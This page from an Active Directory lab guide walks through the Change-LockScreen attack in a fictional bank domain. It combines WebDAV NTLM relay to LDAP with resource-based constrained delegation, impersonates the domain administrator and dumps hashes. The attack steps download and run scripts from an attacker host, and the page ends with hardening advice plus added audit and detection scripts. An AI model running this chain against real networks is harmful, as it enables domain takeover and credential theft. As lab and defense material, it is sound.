Building a Windows AD lab
Change-LockScreen

Last updated 2 years ago

Configuring

  1. Login to WEB01 as the Administrator user with password Welcome01!.

  2. Open PowerShell and execute the following command to enable WebDAV:

Install-WindowsFeature WebDAV-Redirector -Restart

  3. After the server restarts, open the "Windows Defender Firewall" to open up the SMB port.

  4. Click on "Allow an app or feature through Windows Defender Firewall".

  5. Select "File and Printer sharing" and click on "OK".

Attacking

How it works

Abuse the lockscreen image changing functionality to achieve a webdav network authentication as SYSTEM from the given computer. Then relay the authentication to the Active Directory LDAP service in order to set up Resource-Based Constrained Delegation to that specific machine.

Tools

Executing the attack

Prerequisite

  • A low-privileged shell on a machine.

  • An account with an SPN associated, or the ability to add new machine accounts (the default value of this quota is 10).

  • The WebDAV Redirector feature must be installed on the victim machine (Windows 10 has it by default, but it has to be installed manually on Server 2016 and later).

  • A DNS record pointing to the attacker's machine (by default, authenticated users can create one).

Executing the attack

  1. It is expected that a low-privileged shell has already been gained on WEB01 through the SQL server.

  2. Get the machine account quota from the domain with crackmapexec:

crackmapexec ldap 10.0.0.5 -u richard -p Sample123 -M MAQ

The machine account quota is 10, meaning we (all authenticated users) can create our own computer object in the domain.

  3. Create the machine account FAKE01 with password 123456 with Powermad:

iex (iwr http://192.168.248.3:8090/Powermad.ps1 -usebasicparsing)
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

  4. Create a DNS record for WebDAV pointing to our attacking machine with Invoke-DNSUpdate. The DNS record is required for the WebDAV connection to work: it won't connect through an IP, only through a hostname. We create the DNS record webdav.amsterdam.bank.local pointing to our attacking machine's IP.

iex (iwr http://192.168.248.3:8090/Invoke-DNSUpdate.ps1 -usebasicparsing)
Invoke-DNSUpdate -DNSType A -DNSName webdav.amsterdam.bank.local -DNSData 192.168.248.3 -Realm amsterdam.bank.local

We now have all our prerequisites. Time to escalate our privileges.

  5. Run ntlmrelayx on our Kali machine and set it up so that it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute that allows our created computer object FAKE01 to act on behalf of WEB01:

python3 /opt/impacket/examples/ntlmrelayx.py -t ldap://10.0.0.3 --delegate-access --escalate-user FAKE01$ --serve-image ./image.jpg

  6. Run the Change-LockScreen tool in the shell of WS01 and check the ntlmrelayx output. The Change-LockScreen command will give an error, but this doesn't matter:

iex (iwr http://192.168.248.3:8090/Change-Lockscreen.ps1 -usebasicparsing)
change-lockscreen -webdav \\webdav@80\

When we check the ntlmrelayx output we see that FAKE01 can now impersonate users on WEB01.

If we open the attribute editor on DC02 for WEB01 we can see the msDS-AllowedToActOnBehalfOfOtherIdentity attribute:

  7. Create a CIFS service ticket using FAKE01, impersonating the domain admin Administrator, with Impacket's getST.py. Fill in the password 123456.

getST.py amsterdam/FAKE01@10.0.0.5 -spn cifs/web01.amsterdam.bank.local -impersonate administrator -dc-ip 10.0.0.3

  8. Use this ticket and run secretsdump.py to dump the local admin hashes of WEB01.

export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass web01.amsterdam.bank.local

Cleanup

  1. Login to DC02 as Administrator with the password Welcome01!.

  2. Execute the following command to remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute from WEB01:

Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null -Identity web01

  3. Execute the following command to remove the FAKE01 computer we created:

Get-ADComputer fake01 | Remove-ADObject

  4. Open "DNS Manager", expand DC02 --> Forward Lookup Zones --> and click on amsterdam.bank.local. Remove the DNS record created for webdav:

  5. From our Kali machine, set the SQL server settings back:

mssql-cli -S 10.0.0.5 -U sa -P sa
EXEC sp_configure 'xp_cmdshell',0
RECONFIGURE
EXEC sp_configure 'show advanced options',0
RECONFIGURE

Defending

Recommendations

  • Change who can add computers to the domain.

  • Add privileged users to the protected users group.

  • Add the flag "Account is sensitive and cannot be delegated".

  • Remove the WebDav client from servers and workstations.
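
To turn the four recommendations above into a repeatable check, the script below audits each of them in one pass. It is an added example and is not part of the original page or of any tool the page references. It assumes Windows PowerShell 5.1 with the RSAT ActiveDirectory module, run on DC02 (the domain controller of amsterdam.bank.local in this lab) with an account that can read the domain; the host list, the message texts and the final LDAP-signing check (which addresses the relay-to-LDAP step of the attack rather than one of the listed bullets) are my own additions.

```powershell
# Added audit script, not part of the original page or of the tools it uses.
# Checks the four recommendations above plus LDAP signing on the DC it runs on.
# Assumptions: Windows PowerShell 5.1, RSAT ActiveDirectory module, executed on
# DC02 by an account that can read the domain. Host names are the lab machines.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$hosts  = @('WEB01', 'WS01', 'FILE01')   # lab machines from this book; adjust as needed

# 1. Who can add computers: ms-DS-MachineAccountQuota, 10 by default.
$maq = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($maq -gt 0) {
    Write-Warning "ms-DS-MachineAccountQuota = $maq : every authenticated user may create $maq computer objects (the FAKE01 step)."
} else {
    Write-Output "ms-DS-MachineAccountQuota = 0: only explicitly delegated principals can join computers."
}

# 2 + 3. Privileged users: Protected Users membership and the
#        'Account is sensitive and cannot be delegated' flag (AccountNotDelegated).
$protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive | Select-Object -ExpandProperty SamAccountName)
$admins    = Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Where-Object { $_.objectClass -eq 'user' }
foreach ($a in $admins) {
    $u = Get-ADUser -Identity $a.distinguishedName -Properties AccountNotDelegated
    if ($protected -notcontains $u.SamAccountName) {
        Write-Warning "$($u.SamAccountName) is a Domain Admin but not a member of Protected Users."
    }
    if (-not $u.AccountNotDelegated) {
        Write-Warning "$($u.SamAccountName) can still be impersonated through delegation (AccountNotDelegated is false)."
    }
}

# 4. WebDAV client (the WebClient service) on machines that should not have it.
#    Without it, the lock-screen trick above cannot produce a WebDAV authentication.
foreach ($h in $hosts) {
    $svc = Get-Service -ComputerName $h -Name WebClient -ErrorAction SilentlyContinue
    if ($svc) {
        Write-Warning "$h : WebClient service present ($($svc.Status)); on servers remove it with 'Uninstall-WindowsFeature WebDAV-Redirector'."
    } else {
        Write-Output "$h : no WebClient service."
    }
}

# 5. Which computers already carry msDS-AllowedToActOnBehalfOfOtherIdentity.
#    After the attack above, WEB01 would list FAKE01$ here; legitimate RBCD should be known and documented.
Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
    Where-Object { $_.PrincipalsAllowedToDelegateToAccount.Count -gt 0 } |
    ForEach-Object {
        Write-Warning ("{0}: delegation allowed from {1}" -f $_.Name, ($_.PrincipalsAllowedToDelegateToAccount -join ', '))
    }

# 6. LDAP signing on this DC. The relay step above sends NTLM to ldap://; with
#    LDAPServerIntegrity = 2 (require signing) the DC rejects that relayed bind.
$ntds = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' -ErrorAction SilentlyContinue
if ($ntds -and $ntds.LDAPServerIntegrity -eq 2) {
    Write-Output "LDAP signing is required on this DC."
} else {
    Write-Warning "LDAP signing is not required on this DC (LDAPServerIntegrity is not 2); NTLM relay to LDAP remains possible."
}
```

Run it as a scheduled job on the DC and treat every Write-Warning line as a finding. In this lab, a clean run after the Cleanup section above should still warn about the machine account quota and LDAP signing, because the lab does not change those defaults.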

Detection
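
Two Security-log events on the DC record what the attack above does: 4741 (a computer account was created) when FAKE01 is added, and 5136 (a directory service object was modified) when the relayed LDAP write sets msDS-AllowedToActOnBehalfOfOtherIdentity on WEB01. The query below is an added example, not from the page's author, that pulls both out of the log. It assumes it runs on DC02 with rights to read the Security log, and that the "Audit Directory Service Changes" subcategory is enabled with a SACL on the computer objects (otherwise 5136 is never written); the 24-hour window and the message texts are my own choices.

```powershell
# Added detection example, not part of the original page. Reads the Security
# log of the DC the relay wrote to (DC02 in this lab) for the two events the
# attack above leaves behind: 4741 (computer account created, the FAKE01 step)
# and 5136 (directory service object modified) on the attribute
# msDS-AllowedToActOnBehalfOfOtherIdentity. Assumptions: run on the DC with
# event-log read rights; "Audit Directory Service Changes" is enabled and the
# computer objects carry a SACL, otherwise 5136 is never logged.
$since = (Get-Date).AddHours(-24)

# Pull one named field out of the event's EventData XML.
function Get-EventDataField {
    param([xml]$EventXml, [string]$Name)
    $node = $EventXml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }
    if ($node) { $node.'#text' } else { $null }
}

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4741, 5136; StartTime = $since } -ErrorAction SilentlyContinue

foreach ($e in $events) {
    $x = [xml]$e.ToXml()
    switch ($e.Id) {
        4741 {
            $creator = Get-EventDataField $x 'SubjectUserName'
            $target  = Get-EventDataField $x 'TargetUserName'
            # With MachineAccountQuota > 0 the subject can be any domain user (richard above),
            # not a member of a group that is supposed to join computers.
            Write-Warning ("{0}  4741  computer account {1} created by {2}" -f $e.TimeCreated, $target, $creator)
        }
        5136 {
            $attr = Get-EventDataField $x 'AttributeLDAPDisplayName'
            if ($attr -eq 'msDS-AllowedToActOnBehalfOfOtherIdentity') {
                $objectDn = Get-EventDataField $x 'ObjectDN'
                $subject  = Get-EventDataField $x 'SubjectUserName'
                $objectCn = (($objectDn -split ',')[0] -replace '^CN=', '')
                # The relayed authentication is the victim's own machine account (SYSTEM on
                # WEB01 authenticates on the network as WEB01$), so a computer editing its
                # own RBCD attribute is the signature of this technique.
                $selfEdit = $subject -and ($subject.TrimEnd('$') -ieq $objectCn)
                $level = if ($selfEdit) { 'SELF-WRITE (relay pattern)' } else { 'review' }
                Write-Warning ("{0}  5136  {1} changed msDS-AllowedToActOnBehalfOfOtherIdentity on {2} [{3}]" -f $e.TimeCreated, $subject, $objectDn, $level)
            }
        }
    }
}
```

A 5136 where the subject is WEB01$ and the object is CN=WEB01 is the relay pattern; a 4741 raised by a normal domain user shortly before it is the machine-account-quota step. Forward both to the SIEM rather than relying on the DC's local log.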

References

Powermad
Invoke-DNSUpdate
Change-LockScreen
Impacket
Executing Commands
Change who can join computers to the domain
Protected users group
Account is sensitive and cannot be delegated
Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation (NCC Group Research)
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools (GitHub)
Powermad/Invoke-DNSUpdate.ps1 at master · Kevin-Robertson/Powermad (GitHub)
GitHub - SecureAuthCorp/impacket: Impacket is a collection of Python classes for working with network protocols (GitHub)